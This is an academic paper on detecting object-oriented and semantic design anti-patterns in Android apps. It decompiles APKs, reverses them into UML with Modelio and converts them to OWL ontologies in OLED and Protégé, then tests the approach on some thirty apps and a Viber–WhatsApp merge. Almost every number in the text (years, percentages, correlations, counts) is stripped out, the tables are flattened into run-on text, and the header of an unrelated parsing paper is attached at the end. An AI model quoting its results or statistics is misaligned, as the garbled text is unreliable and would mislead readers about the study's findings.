� analyzing the relationships among the object-oriented anti-patterns and the detection tools. in the rest of the paper, we subsequently present the related work. next, we present some basic definitions, and the details of the proposed approach is described. after that, the empirical validations of the proposed method are presented, followed by the results and discussion. finally, the concluding remarks are given, along with scope for future work. related works many empirical studies have demonstrated the negative impact of anti-patterns on change-proneness, fault-proneness, and energy efficiency (romano et al., ; khomh et al., ; morales et al., ). in addition to that, hecht et al. ( a), chatzigeorgiou & manakos ( ), hecht, moha & rouvoy ( ) observed an improvement in the user interface and memory performance of mobile apps when correcting android anti-patterns. they found that anti-patterns were prevalent in the evolution of mobile applications. they also confirmed that anti-patterns tend to remain in systems through several releases unless a major change is performed on the system. many efficient approaches have been proposed in the literature to detect mobile applications’ anti-patterns. some researchers concentrate on ensuring that the soft is free of contradictions which are called consistency. alharbi et al. ( ) detected the anti-patterns related to inconsistency in mobile applications that were only related to camera permissions and similarities. joorabchi, ali & mesbah ( ) detected the anti-patterns related to inconsistency in mobile applications using a tool called checkcamp that was able to detect anti-patterns related to inconsistencies between application versions. hecht et al. ( b) used the paprika approach to detect some popular object-oriented anti-patterns in elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the code of mobile applications using threshold technique. linares-vásquez et al. ( ) detected object oriented (oo) anti-patterns in , java mobile applications by using dÉcor. this study focused on the relationship between smell anti-patterns and application domain. also, they showed that the presence of anti-patterns negatively impacts software quality metrics; in particular, metrics related to fault-proneness. yus & pappachan ( ) analyzed more than semantic web papers, and they found that more than mobile applications are semantic mobile applications. they showed that the existence of semantic helps in better local storage and battery consumption. the detection of semantic anti-patterns will improve the quality of mobile applications. palomba et al. ( ) proposed an automated tool called a doctor. this tool can identify android code smells. they made an empirical study conducted on the source code of android applications and revealed that the proposed tool reached % precision and % recall. a doctor detected almost all the code smell instances existing in android applications. hecht et al. ( b) introduced the paprika tool to monitor the evolution of mobile application quality based on anti-patterns. they detected the common anti-patterns in the code of the analyzed applications. they detected seven anti-patterns; three of them were oo anti-patterns and four are mobile applications anti-patterns. 
reverse engineering is the process of analyzing software systems to identify the components of the systems and the interrelationships between them and presenting the systems in other forms or at a higher level of abstraction (chikofsky & cross, ). in this paper, we used re to transfer code level to design level for detecting mobile applications’ anti-patterns. re techniques are important for understanding the construction of the user interface and algorithms of applications. additionally, we can know all the properties of the application, its activities, and permissions and can read the mainfest.xml of the applications. re techniques have been used with mobile applications for many purposes not just for detecting anti-patterns. song et al. ( ) used re for improving the security of android applications. while zhou et al. ( ) used the re technique to detect logging classes and to remove logging calls and unnecessary instructions. also, arnatovich et al. ( ) used re to perform program analysis on a textual form of the executable source and to represent it with an intermediate language (il). this il has been introduced to represent applications executable dalvik (dex) bytecode in a human-readable form. ontology and software engineering according to the ieee standard glossary of software engineering terminology-description ( ), software engineering is defined as “the application of a systematic, disciplined, quantifiable approach to the development, operation, and maintenance of software.” also, from the knowledge engineering community perspective, computational ontology is defined as “explicit specifications of a conceptualization.” according to calero, ruiz & piattini ( ), happel & seedorf ( ), the importance of sharing knowledge to move the software to more advanced levels require an explicit definition to help machines interpret this knowledge. happel & seedorf ( ) decided that ontology is the most promising way to address software engineering problems. elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ elsayed et al. ( ) proofed the similarities in infrastructures between uml and ontology components. they proposed checking some uml quality features using ontology and ontology reasoning services to check consistency and redundancies over uml models. this would lead to a strong relationship between software design and ontology development. in software engineering, ontologies have a wide range of applications, including model transformations, cloud security engineering, decision support, search, and semantic integration (kappel et al., ; aljawarneh, alawneh & jaradat, ; maurice et al., ; bartussek et al., ; de giacomo et al., ). semantic integration is the process of merging the semantic contents of multiple ontologies. the integration may be between applications that have the same domain or have different domains to take the properties of both applications. we make ontology integration for many reasons: to reuse the existing semantic content of applications, to reduce effort and cost, to improve the quality of the source content or the content itself, and to fulfill user requirements that the original ontology does not satisfy. proposed method in this section, we introduce the key components of the proposed method for analyzing the design of mobile applications to detect design anti-patterns, and for making semantic integration between mobile applications via ontology reengineering. 
the proposed method for anti-pattern detection consists of three main phases and is summarized in fig. . also, there is an optional phase called the integration phase. . the first phase presents the process of reformatting the mobile application to java format. . the second phase presents the reverse-engineering process. in this phase, we used re to reverse the java code of mobile applications and generating uml class diagram models. additionally, many design anti-patterns were detected. the presented reverse approach is accurate enough to analysis the information that we need about apk to reverse uml models of the applications. . the third phase completes the anti-patterns detection and correction processes. this phase converts uml mobile application model to owl ontology, then analyzes the relationships among object-oriented anti-patterns and offers methods to resolve the anti-patterns related to semantic and inconsistency. after that, we can regenerate the java code of mobile applications. the developer can ensure that anti-patterns in existing applications will not be repeated in application revisions and may improve both operational characteristics and user experience. . the integration phase is an optional fourth phase. in this phase, we integrate two applications by merging the owl ontologies of both applications. from these two ontologies, we will yield one integrated application for doing both services with minimum anti-patterns. we will present in detail the rationale provided for why this integration is needed as an optional phase if we need. elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the integration of mobile applications the integration process is most for the inclusion of new skill sets for applications such as iot or monitoring applications or potentially voice-activation integration into an existing application. but, here we were interested in presenting a new manner for homogenous integration to combine the advantages of two mobile applications in a new pattern. in this section, we provided a rationale for why this integration is needed and presenting the integration as an extra phase if we need where the other detection phases do not change. patterns are advanced methods to develop any mobile applications. the integration or merging of mobile applications is a good step in mobile application development. the advantage of the integration of mobile applications is in responding to the puzzling selection of the appropriate application from a set of applications. this will achieve the same objective if each application has a different advantage and the developer wants to start to improve pattern combines all advantage without anti-patterns. to clear our idea, we choose two homogenous applications: viber and whatsapp. they are the most popular messaging and voice over ip applications. both viber and whatsapp are similar in services, features, security, and cost. there is plenty to like about both applications: they produce the same services as end-to-end encryption, support groups and video calls, support on any operating system, allow transmission of documents or multimedia, and work over g, g, and wi-fi. well, both are fantastic in their way, but which one is better for the developer as a pattern for refinement? we found that viber had been offering both video and voice calling for a far longer time than whatsapp and has a hidden chat feature. 
also, viber permits the user to play a list of games with other viber contacts. however, whatsapp is popular and easy to use. we can make the integration of both applications and take the best skills of both. we imagine that when producing a new application we can directly integrate it to the old one without replacing. figure the proposed method phases. full-size doi: . /peerj-cs. /fig- elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the case of heterogonous integration applications, the developer, for example, may want to develop a new health care hybrid application. from the website “free apps for me” (https://freeappsforme.com/), a developer can find at least seven applications for measuring blood pressure. all of them are free and available on a different platform. there are also at least diabetes applications. when a developer merge two applications (one for measuring blood pressure as the “smart blood pressure” application and the other for controlling diabetes as the “onetouch reveal” application), the integration phase will yield one integrated application for doing both services, with minimum anti-patterns. then the developer can add the new relations between these disease controller without conflict. the integration allows the combination of the skills of both applications to get new mobile application pattern. these two examples of two types of integration answer the question of why we need to integrate mobile applications. we suggest using the integration pattern, then comparing between the two integration proposed methods to select the suitable one. the first integration method is for after decompiling the apk of the applications. we use re methodology for generating one uml class diagram of both applications. then we start the detection of the anti-patterns process for the integrated application (fig. ). the second integration method is through merging the owl ontologies of both applications using the prompt plugin in protégé as the ontology editor as introduced in fig. . the implementation in this section, we propose the implementation of the proposed detection method and determine which packages are suitable for each phase. � the first phase: apk files are zip files used for the installation of mobile apps. we used the unzip utility for extracting the files stored inside the apk. it contained the androidmanifest.xml, classes.dex containing the java classes we used in the reverse process, and resources.arsc containing the meta-information. we de-compiled the apk files using apktool or android de-compiler. android de-compiler is a script that combines different tools to successfully de-compile any (apk) to its java source code figure merging uml class diagrams of the mobile apps. full-size doi: . /peerj-cs. /fig- elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://freeappsforme.com/ http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and resources. finally, we used a java de-compiler tool such as jd-gui to de-compile the java classes. jd-gui is a standalone graphical utility that displays the java code of “. class” files. the input of the first phase was the apk file of the mobile application and the output was the java classes of the apk application. jd-gui is accurately enough to generate the java code that we use to reverse the models of the applications. 
� the second phase: we used a re approach for generating the uml class diagram models of the mobile applications. elsayed, el-dahshan & ghannam ( ) compared between uml tools, the authors found that modelio . is a suitable tool for modeling and detecting uml design anti-patterns. the uml class diagram was generated by reversing the java binaries of the mobile app. detecting anti-patterns in the uml model is the first step in the detection process. the input of the second phase was classes.java of the app and the output was the uml class diagram model of the app with a list of the detected anti-patterns. � the third phase: by converting the model to xml format, we could generate it as an ontouml model in oled, which is the editor of ontouml for detecting semantic anti-patterns. ontouml is a pattern-based and ontologically well-founded version of uml. its meta-model has been designed in compliance with the ontological distinctions of a well-grounded theory named the unified foundational ontology. oled editor also supports the transformation of the oled file to the owl ontology of the mobile app, allowing the detection of inconsistency and semantic anti-patterns using the “reasoner” ontology in protégé. protégé is the broad ontology editor commonly used by many users. the integration phase (the fourth optional phase): we propose two methods for integrating mobile applications. the first method is merging the uml models at the second phase when we reverse the models from java code and then completing the detection phases over the integrated application. the second method is merging the owl ontologies of the both applications using a prompt (protégé plugin) to generate one owl ontology pattern. figure shows the both applications “viber and whatsapp” components before merging. figure shows the integrated application; fig. has three tabs (classes, slots, and instances) which are the components of the ontology. every tab shows the components of its type after integration. finally, we used “reasoner in protégé” to check the consistency after integration. empirical validations we assessed our approach by reporting the results we obtained for the detection of anti-patterns on a random sample of popular android applications downloaded randomly from the apk mirror. applications under analysis table presents the downloaded applications from the apk mirror. we selected some popular applications such as youtube, whatsapp, play store, and twitter. the size of the applications included the resources of the application, as well as images and data files elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (table ). the research study included the identification and repetition of anti-patterns across different domains and different sizes. case study on “avast android mobile security” to explain the proposed method, we presented a snapshot of it in a different case study “avast android mobile security.” the case study is one of the mobile applications that figure “viber and whatsapp” ontologies before integration in protégé. full-size doi: . /peerj-cs. /fig- figure owl ontology merging. full-size doi: . /peerj-cs. /fig- elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ is proposed in this article for the evaluation of the proposed method. the case study is downloaded from the apkmirror. 
the “avast android mobile security” secures the devices against phishing attacks from emails, phone calls, infected websites, or sms messages. also, it has many other features as antivirus engine, app lock, call blocker, anti-theft, photo vault, virtual private network, and power save. the reason for choosing “the avast android mobile security” application as a case study is that it has the maximum number of the detected anti-patterns using the proposed method. using the reverse methodology, we generated the uml class diagram model of the java classes in modelio. the model includes the classes, subclasses, class attributes, operations, and the associations between them (fig. ). after generating the uml class diagram of the application in modelio, we detected repeated anti-patterns in the “avast android mobile security.” the anti-patterns are shown in fig. . the number and the location of the anti-patterns were determined. figure the result slots of the ontology after integration in protégé. full-size doi: . /peerj-cs. /fig- elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ there were detected anti-patterns (without repeat): “namespaces have the same name,” “namespace is leaf and is derived,” “namespace is leaf and is abstract,” “generalization between two incompatible elements,” “a public association between two classifiers one of them is public and the other is privet,” “classifier has several operations with the same signature,” “classifier has attributes with the same name,” “the status of an attribute is abstract and class,” “a destructor has two parameters,” and finally “multiplicitymin must be inferior to multiplicitymax.” figure shows a sample of them. to convert the uml model to xml format, we converted it into an enterprise architecture file then converted it to an oled file. in the “avast android mobile security” oled file, we validated the model for detecting the anti-patterns. the detected table the description of the mobile apps under analysis. mobile application name size (mb) downloads description of use test dpc . . . , , libraries and demo avast . . security . , antivirus engine and mobile security free-calls-messages . , communication beautiful gallery . . photography play store . . . , google play store wall paper . . . , personalization oasis-feng/island . . privacy protection and parallel running netflix- - - -build . , entertainment remainder . . . , remainder sound-picker . . . , samsung sound picker air-command . . . , air command lifesum-healthy-lifestyle . , diet plan, food diary, macro calculator, calorie counter, and healthy recipes background-defocus . . . , photography gasbuddy-find-cheap-gas . travel and local soundcloud-music-audio. . . , music and audio network-monitor-mini . . . monitor the upload and download speed per second casper android . . . . , messaging app snapchat line . . . communication diagnosises . medical viber . . . . , communication whatsapp . . . , communication firefox . . , communication blue- email and calendar . . . . . productivity google camera . . . . , photography youtube . . , video players true caller . . . communication samsung gallery . . . , photography twitter . . . news and magazines chrome browser . . . , communication elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ anti-patterns in the different apps were: association cycle anti-patterns, binary relations with overlapping ends anti-patterns, imprecise abstraction anti-patterns, and relation composition anti-patterns. after anti-patterns detection using ontouml editor, oled supports the transformation of oled file to the owl ontology. we checked the inconsistency anti-patterns using the reasoner of the ontology editor (protégé). the reasoner detected the anti-patterns figure the generated uml class diagram of the case study. full-size doi: . /peerj-cs. /fig- figure modelio anti-patterns. full-size doi: . /peerj-cs. /fig- elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ related to inconsistency as (similar name, multiplicity constraints, and cyclic inheritance). using the reasoner of ontology over the case study, we detected the anti-patterns in the classes that have the anti-patterns namespaces have the same name, classifier has several operations with the same signature, classifier has attributes with the same name, and multiplicitymin must be inferior to multiplicitymax, which we detected after generating the class diagram in modelio, and detected the anti-pattern (association cyclic) which was detected via oled. the treatment or correction of the detected anti-patterns is classified into the following: � modelio presents the solution as a list of recommendation which developer can do it manually. in this case study, table presents the anti-patterns and the method of correction. � oled presents automatic solutions to correct the anti-patterns which we list in table . � reasoner in protégé presents all inconsistency anti-patterns where as reasoner gives just the location of the inconsistent classes as in fig. . results and discussion we applied our proposed method on a sample of android applications, which we downloaded from the apk mirror. the results present the detected anti-patterns in the mobile applications and the relation between the different types of anti-patterns. the proposed method detected anti-patterns. the total number of anti-patterns that appeared in the applications was , anti-patterns. we classified the anti-patterns according to their existence in the uml class diagram components. the occurrences of the anti-patterns are given in table . every group has the anti-patterns that were detected in figure the anti-pattern “classifier has several operations with the same signature.” full-size doi: . /peerj-cs. /fig- elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ it. for example, the group “anti-patterns in operations” presents all anti-patterns that were detected in the operations using the three tools. table shows the detected anti-patterns in each application using the proposed method and the total number of anti-patterns in the mobile applications. we found that the “anti-patterns in the class” group is the most commonly detected anti-pattern in android applications. the “anti-patterns in operation” is the least commonly appeared anti-pattern (fig. ). we measured the relations between anti-patterns groups using correlation coefficient. 
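the sketch below illustrates, in python, the kind of correlation computation used in this analysis: pearson's r between the per-application counts of two anti-pattern groups. the count vectors are made-up placeholders for illustration, not values from the study.

from scipy.stats import pearsonr

# hypothetical per-application counts for two anti-pattern groups
attribute_counts = [3, 0, 5, 2, 7, 1]
operation_counts = [2, 0, 6, 1, 8, 1]

r, p_value = pearsonr(attribute_counts, operation_counts)
print(f"pearson r = {r:.2f} (p = {p_value:.3f})")
# a positive r means the two groups tend to rise and fall together across applications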
correlation coefficient is a statistical measure of the degree to which changing the value of one variable predict changing to the value of the other. a positive correlation indicates that the extent to which those variables increase or decrease in parallel. while a negative correlation indicates the extent to which one variable increases as the other table ontouml anti-patterns and the correction way. the anti-pattern the method of correction association cycle chang the cycle to be closed or open cycle binary relation with overlapping ends declare the relation as anti-reflexive, asymmetric, and anti-transitive imprecise abstraction add domain-specific constraints to refer to which subtypes of the association end to be an instance of the other end may be related relation composition add ocl constraints which guarantee that if there is a relation between two types and one of them has subtypes, there must be constraints says that the subtypes are also in a relation with the other type relation specialization add constraints on the relation between the type and the super-type, declaring that the type is to be either a specialization, a subset, a redefinition or disjoint with relation sr table ten modelio anti-patterns and their correction way. the anti-pattern the method of correction namespaces have the same name change the name of the conflicting namespaces namespace is leaf and is derived make the namespace non-final namespace is leaf and is abstract make the namespace non-final generalization between two incompatible elements change the source or the target in order to link two compatible elements a public association between two classifiers one of them is public and the other has different visibility change the visibility of the target class to public classifier has several operations with the same signature rename one of the operations or change their parameters classifier has attributes with the same name rename the classifiers attributes multiplicitymin must be inferior to multiplicitymax change the value of the minimum multiplicity to be less than the maximum multiplicity the status of an attribute is abstract and class at the same time set only one of the statuses to true a destructor has parameters remove these parameters or remove the destructor stereotype from the method elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ decreases. table presents the correlations between anti-patterns groups. the tool can detect certain group, it also can detect in parallel the other as attributes anti-patterns with operations anti-patterns. also, appearance of attributes anti-patterns in certain applications indicates the appearance of operations anti-patterns strongly. then the correlation between the five groups of anti-patterns is used to know if the existence of any type of them implies the existence of other type. there was a strong negative correlation (- . ) between namespaces anti-patterns and association anti-patterns. also, a strong positive correlation ( . ) between attributes anti-patterns and operations anti-patterns. table occurrences of the anti-patterns in the mobile apps. the group percentage of occurrences across models total # of occurrences anti-patterns in attributes . % anti-patterns in namespaces . % anti-patterns in operations . % anti-patterns in associations . % anti-patterns in the class . % total , figure the inconsistent classes using reasoner detection. full-size doi: . /peerj-cs. 
[table : the anti-patterns detected in each mobile app. the original two-dimensional layout (one row per application, one column per anti-pattern, with the number of appearances of each) could not be recovered from this copy.]

also, we analyzed the correlation between the detection tools of the proposed method (table ). the greatest correlation was between modelio and protégé. to assess the direct relation between protégé and modelio, we calculated the statistical means of the anti-patterns detected by each tool (modelio, protégé, and oled) on the mobile applications, as in fig. ; the figure shows the similarity between the means of protégé and modelio, in line with the correlation result. now, we want to answer statistically the questions "do we need to use the three tools?" and "is there a relation between them?" for a statistical analysis that explains the relation among the three tools and the anti-patterns' groups, we used the analysis of variance (anova) test. this is to determine whether there are any statistically significant differences between the mean numbers of anti-patterns detected by each one of the tools, and also to determine whether there is any relation between the anti-pattern groups and the features of the mobile applications.

[figure : the occurrences of the detected anti-patterns' groups.]

table : the correlation among anti-pattern groups (anti-pattern pair: correlation coefficient r). attributes and namespaces: −. ; attributes and operations: . ; attributes and associations: . ; attributes and classes: . ; namespaces and operations: −. ; namespaces and associations: −. ; namespaces and classes: . ; operations and associations: . ; operations and classes: . ; associations and classes: . .

we use anova to compute a test statistic (the f-ratio), from which we obtain a probability (p-value); a p-value below the usual significance threshold suggests that at least one group mean is significantly different from the others.
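as an illustration of the test described here, the python sketch below runs a one-way anova over per-application detection counts for the three tools; the numbers are hypothetical placeholders, not the reported results.

from scipy.stats import f_oneway

# hypothetical numbers of anti-patterns detected per application by each tool
modelio = [10, 4, 7, 12, 3]
oled = [2, 1, 0, 3, 1]
protege = [9, 5, 6, 11, 2]

f_ratio, p_value = f_oneway(modelio, oled, protege)
print(f"F = {f_ratio:.2f}, p = {p_value:.4f}")
# a small p-value would indicate that at least one tool's mean differs from the others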
the null hypothesis is that all population means are equal; the alternative hypothesis is that at least one population mean differs from the rest. the degrees of freedom (df) between groups is , and the df within groups is . we found that the significance values are . , . , and . for protégé, modelio, and oled, respectively. this implies that the null hypothesis is false, i.e., all of the detection tools are necessary and required for the detection of the anti-patterns. the anova also showed statistically that the features and the specifications of the applications were not a concern; that is, the low f-value means that the groups are close together relative to the variability within each group.

we report the result of the integration phase separately because it is an optional phase. in the case of homogeneous applications, we found that the numbers of detected anti-patterns in the output application were not the same: the number of anti-patterns detected after merging with the ontology integration tool prompt was smaller than the number detected after merging with the modelio tool. this indicates that semantic integration decreases the number of anti-patterns in the merged application and increases the accuracy of detecting anti-patterns in mobile applications.

table : the correlation among the three tools (systems: correlation coefficient r; specification). modelio and ontouml: −. (a reverse correlation between modelio and ontouml); modelio and protégé: . (a direct correlation between modelio and protégé); protégé and ontouml: −. (a reverse correlation between protégé and the ontouml editor).

[figure : the means of the detection tools.]

table shows the number of anti-patterns in each application in the integration case study (viber and whatsapp) and the number of them in the mobile application pattern after merging. the enhancement using ontology is approximately . %, in addition to a consistency check. the formula to calculate the percentage increase between two values is

percent increase = ((second value − first value) / first value) × 100 ( )

substituting the total number of anti-patterns obtained using modelio as the first value and the total number obtained using prompt as the second value, the percentage change of ≅ . % implies that using ontology integration by prompt (a protégé plugin) instead of uml integration by modelio improves the detection. additionally, using ontology to separately refine viber or whatsapp as a pattern enhanced them by approximately . % and %, respectively, in addition to a consistency check by the "reasoner."

conclusions
in this paper, we focused on improving the quality of mobile applications. we introduced a general method to automatically detect anti-patterns, not by using specific queries, but by using modelio, oled, and protégé in a specific order to obtain positive results. also, with respect to the related work, our proposed method is more general than other methods, as it supports semantic and structural anti-pattern detection at the design level. to evaluate the proposed method, we applied it to a sample of mobile applications; it detected semantic and structural design anti-patterns.
according to the proposed classification of anti-patterns, “the anti-patterns in the class group” was the most frequent anti-pattern, and “the anti-patterns in the attribute group” was the least frequent. from the perspective of anti-patterns detection, the analysis of results also showed that there is a correlation between the modelio and protégé platforms. also, there is no correlation between oled and protégé and no correlation between modelio and oled. table anti-patterns number before and after merging. mobile apps viber whatsapp the integrated app total (merging uml designs) # of detected anti-patterns in first method using modelio (merging ontologies) # of detected anti-patterns in second method using protégé elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we found that using ontology in the integration phase increases the detection percentage approximately by . % and guarantees consistency which is assessed by the reasoner of the ontology. accordingly, semantic ontology integration has a positive effect on the quality of the new application. this helped with developing a correct, consistent, and coherent integrated pattern that has few anti-patterns. finally, we recommend that the developer, before using any mobile application as a pattern, should check the design of the selected application against the anti-pattern. when a developer concerned with avoiding certain anti-patterns type, the correlations between anti-patterns groups, and between tools will help him. also, the proposed method considered the issues and problems of developers who are revising android applications and integrating new packages of code skill sets. a code review such as the methodology proposed could be very valuable in terms of not carrying forward existing anti-patterns and not incorporating new code flawed with poor design. the reverse deeply in owl ontology of a mobile application very useful. in the future, we are going to solve the problem of big ontologies which cannot be opened in ontology editors as protégé to complete the detection process. although, detection of anti-patterns at the design level is very useful and reduces some anti-patterns in the code level, we will refine the metric method for detecting code level anti-patterns on big ontology. also, we will create a semantic web application for anti-patterns to collect all detection tools of the two levels and anti-patterns catalog. finally, the correction phases in modelio and reasoner are still open issues. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � eman k. elsayed conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft � kamal a. eldahshan authored or reviewed drafts of the paper, approved the final draft. � enas e. el-sharawy conceived and designed the experiments, performed the experiments. � naglaa e. ghannam conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper. elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data availability the following information was supplied regarding data availability: the features of the downloaded mobile apps and the detected anti-patterns are available as a supplemental file. the file shows the relation between the detected anti-patterns and the detection tools and the relation between anti-patterns groups and the detection tools. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references afjehei ss, chen thp, tsantalis n. . iperfdetector: characterizing and detecting performance anti-patterns in ios applications. empirical software engineering : – . alharbi k, blackshear s, kowalczyk e, memon am, chang bye, yeh t. . android apps consistency scrutinized. in: chi’ extended abstracts on human factors in computing systems, april– may , toronto, ontario, canada. new york: acm, – . aljawarneh sa, alawneh a, jaradat r. . cloud security engineering. future generation computer systems : – . arnatovich yl, wang l, ngo nm, soh c. . a comparison of android reverse engineering tools via program behaviors validation based on intermediate languages transformation. ieee access : – doi . /access. . . bartussek w, weiland t, meese s, schurr mo, leenen m, uciteli a, kropf s, herre h, goller c, lauer w. . ontology-based search for risk-relevant pms data. in: biomedical engineering conference (saibmec), biennial, south african. piscataway: ieee, – . calero c, ruiz f, piattini m. eds. . ontologies for software engineering and software technology. berlin, heidelberg: springer science & business media. chatzigeorgiou a, manakos a. . investigating the evolution of bad smells in object-oriented code. in: seventh international conference on the quality of information and communications technology (quatic), porto, portugal. vol. . piscataway: ieee, – . chikofsky ej, cross jh. . reverse engineering and design recovery: a taxonomy. ieee software ( ): – doi . / . . de giacomo g, lembo d, lenzerini m, poggi a, rosati r. . using ontologies for semantic data integration. in: flesca s, greco s, masciari e, saccà d, eds. a comprehensive guide through the italian database research over the last years. cham: springer, – . eick sg, graves tl, karr af, marron js, mockus a. . does code decay? assessing the evidence from change management data. ieee transactions on software engineering ( ): – doi . / . . elsayed e, el-dahshan k, el-sharawy e, ghannam n. . semantic anti-patterns detection in uml models based on ontology catalogue. artificial intelligence and machine learning journal : – . elsayed e, el-dahshan k, ghannam n. . comparative study for detecting mobile application’s anti-patterns. in: proceedings of the th international conference on software and information engineering (icsie ) acm p : , cairo, egypt, april – . ei compendex and scopus, the british university. available at http://www.icsie.org/. elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /access. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://www.icsie.org/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ happel hj, seedorf s. . applications of ontologies in software engineering. 
in: proceedings of the workshop on semantic web enabled software engineering (swese) on the iswc, athens, ga, usa. – . hecht g, benomar o, rouvoy r, moha n, duchien l. a. tracking the software quality of android applications along their evolution (t). in: proceedings of the th ieee/acm international conference on automated software engineering (ase), – november , lincoln, ne, usa. piscataway: ieee, – . hecht g, moha n, rouvoy r. . an empirical study of the performance impacts of android code smells. in: proceedings of the international conference on mobile software engineering and systems, austin, – may. new york: acm, – . hecht g, rouvoy r, moha n, duchien l. b. detecting anti-patterns in android apps. in: proceedings of the nd acm international conference on mobile software engineering and systems (mobilesoft), – may . piscataway: ieee, – . ieee standard glossary of software engineering terminology-description. . ieee standard glossary of software engineering terminology. available at http://ieeexplore.ieee.org/ servlet/opac?punumber= (accessed january ). joorabchi me, ali m, mesbah a. . detecting inconsistencies in multi-platform mobile apps. in: ieee th international symposium on software reliability engineering (issre), – november . piscataway: ieee, – . kappel g, kapsammer e, kargl h, kramler g, reiter t, retschitzegger w, wimmer m. . lifting metamodels to ontologies: a step to the semantic integration of modeling languages. in: proceeding of international conference on model driven engineering languages and systems (models), genova, italy. new york: springer, – . khomh f, di penta m, guéhéneuc yg, antoniol g. . an exploratory study of the impact of antipatterns on class change- and fault-proneness. empirical software engineering ( ): – doi . /s - - -y. linares-vásquez m, klock s, mcmillan c, sabané a, poshyvanyk d, guéhéneuc yg. . domain matters: bringing further evidence of the relationships among anti-patterns, application domains, and quality-related metrics in java mobile apps. in: proceedings of the nd international conference on program comprehension, hyderabad, – june . new york: acm, – . maurice p, dhombres f, blondiaux e, friszer s, guilbaud l, lelong n, khoshnood b, charlet j, perrot n, jauniaux e, jurkovic d, jurkovic jm. . towards ontology-based decision support systems for complex ultrasound diagnosis in obstetrics and gynecology. journal of gynecology obstetrics and human reproduction ( ): – doi . /j.jogoh. . . . morales r, saborido r, khomh f, chicano f, antoniol g. . anti-patterns and the energy efficiency of android applications. arxiv preprint available at http://arxiv.org/abs/ . . obrst l, grüninger m, baclawski k, bennett m, brickley d, berg-cross g, hitzler p, janowicz k, kapp c, kutz o, lange c, levenchuk a, fran q, rector a, schneider t, spero s, thessen a, vegetti m, vizedom a, westerinen a, west m, yim pp. . semantic web and big data meet applied ontology. applied ontology ( ): – . palomba f, di nucci d, panichella a, zaidman a, de lucia a. . lightweight detection of android-specific code smells: the adoctor project. in: ieee th international conference on software analysis, evolution and reengineering (saner), – february . piscataway: ieee, – . elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://ieeexplore.ieee.org/servlet/opac?punumber= http://ieeexplore.ieee.org/servlet/opac?punumber= http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /j.jogoh. . . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. 
parnas dl. . software aging. in: proceedings of the th international conference on software engineering (icse), sorrento, – may. piscataway: ieee, – . raja v. . introduction to reverse engineering. in: raja v, fernandes k, eds. reverse engineering. springer series in advanced manufacturing. london: springer, – . romano d, raila p, pinzger m, khomh f. . analyzing the impact of anti-patterns on change-proneness using fine-grained source code changes. in: proceedings of the th working conference on reverse engineering (wcre), kingston, – october. piscataway: ieee, – . song l, tang z, li z, gong x, chen x, fang d, wang z. . appis: protect android apps against runtime repackaging attacks. in: ieee rd international conference on parallel and distributed systems (icpads), shenzhen, china. piscataway: ieee, – . yamashita a, moonen l. . exploring the impact of inter-smell relations on software maintainability: an empirical study. in: proceedings of the international conference on software engineering, san francisco, ca, usa. piscataway: ieee press, – . yus r, pappachan p. . are apps going semantic? a systematic review of semantic mobile applications. in: international workshop on mobile deployment of semantic technologies (modest). bethlehem: iswc, – . zhou x, wu k, cai h, lou s, zhang y, huang g. . logpruner: detect, analyze and prune logging calls in android apps. science china information sciences ( ): – doi . /s - - -x.
shift-reduce constituent parsing with neural lookahead features

jiangming liu and yue zhang
singapore university of technology and design, somapah road, singapore, {jiangming liu, yue zhang}@sutd.edu.sg

abstract
